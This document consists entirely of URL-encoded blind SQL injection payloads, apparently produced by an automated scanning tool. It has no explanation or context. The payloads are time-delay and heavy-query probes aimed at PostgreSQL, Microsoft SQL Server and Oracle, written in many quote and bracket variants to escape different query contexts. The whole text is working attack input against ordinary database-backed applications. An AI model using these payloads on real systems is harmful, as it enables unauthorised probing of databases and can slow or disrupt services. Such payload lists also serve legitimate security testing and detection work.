-7234%00%27%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27sIvp%27%3D%27sIvp -7500%27%29%20WHERE%204640%3D4640%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -4531%22%29%20WHERE%205803%3D5803%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -6023%29%20WHERE%207424%3D7424%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -7045%27%20WHERE%203505%3D3505%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -4354%22%20WHERE%204540%3D4540%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -9811%20WHERE%204331%3D4331%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -7539%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -4928%27%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -6117%27%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2330%22%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8570%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%284041%3D4041 -9486%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%287881%3D7881 -9146%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%284511%3D4511 -8684%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2413%27%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27NaeH%27%3D%27NaeH -9357%27%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27mLFZ%27%3D%27mLFZ -2228%27%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27KyhO%27%3D%27KyhO -7922%27%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27eYVR%27%3D%27eYVR -3463%27%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27Oklo%27%20LIKE%20%27Oklo -8213%27%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27CLJZ%27%20LIKE%20%27CLJZ -4460%27%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27errL%27%20LIKE%20%27errL -5853%27%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27aoqJ%27%20LIKE%20%27aoqJ -6952%22%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22kuVh%22%3D%22kuVh -1638%22%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22YyOD%22%3D%22YyOD -5925%22%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22ZNFb%22%3D%22ZNFb -4487%22%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22erIr%22%3D%22erIr -2400%22%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22bQPJ%22%20LIKE%20%22bQPJ -6725%22%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22Ldmr%22%20LIKE%20%22Ldmr -9819%22%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22kGUU%22%20LIKE%20%22kGUU -8507%22%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22PvAh%22%20LIKE%20%22PvAh -4495%25%27%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 -3391%25%27%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 -1572%25%27%29%29%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 -4647%25%27%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 -9072%00%27%29%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27qgVt%27%3D%27qgVt -4469%00%27%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27yZfL%27%3D%27yZfL -4362%27%29%20WHERE%206074%3D6074%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -8804%22%29%20WHERE%209495%3D9495%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -7206%29%20WHERE%202406%3D2406%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -7393%27%20WHERE%204155%3D4155%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -5062%22%20WHERE%206472%3D6472%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -8743%20WHERE%205356%3D5356%20OR%208892%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -6481%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29 -4137%27%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29 -9782%27%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29 -1049%22%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29 -4284%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%288882%3D8882 -5461%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%288681%3D8681 -2782%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%281073%3D1073 -8883%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29 -9516%27%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27OTDH%27%3D%27OTDH -4581%27%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%27sLGm%27%3D%27sLGm -2619%27%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%27QWyw%27%3D%27QWyw -3079%27%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27LjvZ%27%3D%27LjvZ -4703%27%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27Mfbf%27%20LIKE%20%27Mfbf -5882%27%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%27mXXU%27%20LIKE%20%27mXXU -4053%27%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%27PAwx%27%20LIKE%20%27PAwx -8632%27%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27rBwv%27%20LIKE%20%27rBwv -3764%22%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%22atJa%22%3D%22atJa -8689%22%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%22ovzr%22%3D%22ovzr -6125%22%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%22HNlz%22%3D%22HNlz -6568%22%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%22wIag%22%3D%22wIag -7319%22%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%22hWae%22%20LIKE%20%22hWae -5878%22%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%22VteU%22%20LIKE%20%22VteU -2361%22%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%22Ddsb%22%20LIKE%20%22Ddsb -2455%22%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%22XJrn%22%20LIKE%20%22XJrn -8706%25%27%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27%25%27%3D%27 -8381%25%27%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 -3952%25%27%29%29%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 -7940%25%27%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27%25%27%3D%27 -4918%00%27%29%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27gEAd%27%3D%27gEAd -7334%00%27%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27QZXN%27%3D%27QZXN -5032%27%29%20WHERE%201479%3D1479%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -8450%22%29%20WHERE%207457%3D7457%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -6739%29%20WHERE%209072%3D9072%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -8525%27%20WHERE%209087%3D9087%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -8994%22%20WHERE%203542%3D3542%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -2094%20WHERE%209460%3D9460%20OR%206117%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28121%29%2C5%29%20--%20 -2407%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -9968%27%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -3522%27%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -7369%22%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5288%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%281897%3D1897 -8242%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%281224%3D1224 -7999%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%287234%3D7234 -4374%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8022%27%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27RWeV%27%3D%27RWeV -8520%27%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27wnqT%27%3D%27wnqT -3403%27%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27LKHt%27%3D%27LKHt -6917%27%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27ZBuE%27%3D%27ZBuE -4897%27%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27LivF%27%20LIKE%20%27LivF -5847%27%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27mhkd%27%20LIKE%20%27mhkd -4559%27%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27ZGgn%27%20LIKE%20%27ZGgn -7536%27%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27bVXA%27%20LIKE%20%27bVXA -8590%22%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22kAxL%22%3D%22kAxL -6399%22%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22gfSD%22%3D%22gfSD -3652%22%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22DDEE%22%3D%22DDEE -5756%22%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22aXWS%22%3D%22aXWS -2620%22%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22nyqi%22%20LIKE%20%22nyqi -6047%22%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22DOsi%22%20LIKE%20%22DOsi -6052%22%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22eIEK%22%20LIKE%20%22eIEK -8794%22%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22IKBl%22%20LIKE%20%22IKBl -4020%25%27%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 -4661%25%27%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 -4916%25%27%29%29%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 -4749%25%27%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 -3579%00%27%29%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27FKSl%27%3D%27FKSl 